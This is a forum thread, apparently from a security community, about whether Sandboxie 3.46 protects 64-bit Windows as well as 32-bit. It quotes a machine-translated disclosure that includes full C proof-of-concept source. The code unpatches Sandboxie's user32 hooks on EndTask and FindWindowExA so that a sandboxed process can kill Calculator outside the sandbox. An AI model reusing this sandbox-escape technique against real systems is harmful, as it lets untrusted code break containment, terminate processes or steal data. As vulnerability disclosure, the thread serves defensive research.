breakout sandboxie 3.46 x64

"Support for 64-bit Windows should now be on par with 32-bit Windows"

I was referring to the many, many problems reported about getting stuff to install or run properly under 64-bit Sandboxie, where the same stuff would work perfectly under 32-bit Sandboxie.

The 64-bit edition of Sandboxie provides a reduced level of protection compared to the 32-bit edition of Sandboxie.

mj0011 wrote:by google translate
==================================

Sandboxie 3.46 to see the official version released in the update statement, sandboxie shamelessly and boastfully claimed that he had the perfect support for the x64-bit operating system, 64-bit operating system and the user can get the same 32-bit operating system user security :

"Improved support for 32-bit and 64-bit Windows Vista and Windows 7. Support for 64-bit Windows should now be on par with 32-bit Windows"

In the X64 on making a perfect defense to support the complete core commercial software, is a very difficult issue, I can not help but praise the beginning of the sandboxie of

After praise and began to test in the end is not able to really support the defense of the X64 After the test I discovered that is not the case, sandboxie simply can not provide and in 64 of 32 equal protection, the 64-bit on, SANDBOXIE a lot of defense is missing, or can easily be bypassed, but the same 32 defense will not be affected.

Give a simple example, in the 32-bit operating systems, the end of the process for EndTask form, sandboxie made a protected achieved by hook NtRequestWaitReplyPort csrss of RPC communication with the interceptor to intercept the terminating of the process, but in 64-bit operating system , the only approved ring3 api hook EndTask way to implement the UI such as isolation

It is clear that the procedure was isolated sandbox can easily break this useless protection, through the sandbox, the process of destruction outside the sandbox or the sandbox outside the process to steal the information.

Here attached a test program, the need win7 x64 Simplified Chinese operating system running (because of hard-coding the window name, etc.), this procedure is used in the X64 on to start run sandbox and they can penetrate the sandbox to terminate outside the sandbox the calculator program.
Test method, start the calculator first, and then run sandbox run endtask.exe, calculator instantly terminated

POC test program source code:

#include "stdafx.h"
#define WINNT 1
#include "windows.h"
#include "winuser.h"
int _tmain(int argc, _TCHAR* argv[])
{
PVOID pAddr = GetProcAddress(GetModuleHandleA("user32.dll") , "EndTask");
PVOID pAddr2 = GetProcAddress(GetModuleHandleA("user32.dll"), "FindWindowExA");

ULONG oldp ;

VirtualProtect(pAddr , 0x5 , PAGE_READWRITE , &oldp);

*(BYTE*)pAddr = 0x48 ;
*(DWORD*)((ULONGLONG)pAddr + 0x1) = 0x08245c89 ;

VirtualProtect(pAddr , 0x5 , oldp, &oldp);

VirtualProtect(pAddr2 , 0x5 , PAGE_READWRITE , &oldp);

*(BYTE*)pAddr2 = 0x48 ;
*(DWORD*)((ULONGLONG)pAddr2 + 0x1) = 0x8338ec83 ;

VirtualProtect(pAddr2 , 0x5 , oldp, &oldp);



HWND h = FindWindowExA(0 , 0 , 0 ,"Calculator");
if (h == 0 )
{printf("cannot find calc\n");}


EndTask(h , TRUE , TRUE );
return 0;
}

ssj100 wrote:Good point patrick. I'm giving him the benefit of the doubt (because we're reading automatically translated text, and may miss the context etc.). However, it does read like a fairly blatant insult.